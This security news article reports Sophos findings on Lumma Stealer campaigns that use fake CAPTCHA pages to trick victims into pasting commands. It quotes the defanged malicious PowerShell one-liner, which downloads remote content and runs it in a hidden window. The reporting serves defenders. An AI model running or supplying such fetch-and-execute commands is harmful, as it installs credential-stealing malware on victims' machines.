Lumma Stealer, a notorious information-stealing malware active since mid-2022, has significantly evolved its tactics, techniques, and procedures in recent months.
Believed to originate from Russian-speaking cybercriminals, this malware continues to be distributed as a Malware-as-a-Service (MaaS) offering, with its developers providing regular updates and support via Telegram channels and a dedicated Gitbook site.
The threat has become increasingly prevalent in cybersecurity incident reports, with thousands of infections documented in the past year alone.
.png
)
The malware primarily targets valuable user data including passwords, session tokens, cryptocurrency wallets, and personal information from compromised devices.
What makes Lumma particularly dangerous is its sophisticated delivery techniques, which have recently expanded to include social engineering through fake CAPTCHA challenges and deceptive download prompts.
These methods exploit user trust in familiar security verification processes, tricking victims into executing malicious commands on their own systems.
Sophos researchers identified multiple Lumma Stealer campaigns during fall and winter 2024-25, documenting how the malware’s tactics have evolved to evade detection.
“The variations we saw in Lumma Stealer behavior are significant to defenders,” noted the Sophos Managed Detection and Response team in their report, emphasizing that these delivery techniques could easily be adapted for other malware beyond Lumma Stealer.
Attack flow
One particularly concerning innovation involves the abuse of Windows PowerShell through deceptive CAPTCHA verification pages.
.webp)
In this attack chain, victims visiting malicious sites are presented with a standard “I’m not a robot” verification prompt, creating a false sense of security and legitimacy.
After clicking the verification box, users are redirected to a second page that instructs them to load Windows “run” command, then press Ctrl+V followed by Enter.
.webp)
This seemingly harmless action actually pastes and executes a concealed PowerShell command that operates in a hidden window:-
C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -
command $uR= hxxps[://]fixedzip[.]oss-ap-southeast5[.]aliyuncs[.]com/n
ew-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t
=$reS.Content; iex $t.webp)
The execution of this command initiates a sophisticated multi-stage attack process. The script retrieves additional malware components from command-and-control servers, ultimately downloading, extracting, and executing the core Lumma Stealer payload.
Once active, this malware systematically accesses browser data, as evidenced in Figure 6 where Autolt3.exe can be seen accessing login data and cookies from Chrome.
What makes this attack vector particularly effective is its use of AES encryption to conceal subsequent payloads.
The malware employs sophisticated obfuscation techniques, including the use of initialization vectors and complex decryption routines, to evade traditional security measures.
This combination of social engineering and advanced technical methods represents a significant evolution in Lumma Stealer’s capabilities.
Security experts recommend implementing robust endpoint protection solutions with behavioral analysis capabilities, as signature-based detection alone proves inadequate against these evolving threats.
Organizations should also prioritize user education around the dangers of CAPTCHA challenges that request unusual actions, particularly those that involve running commands or scripts.
Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.
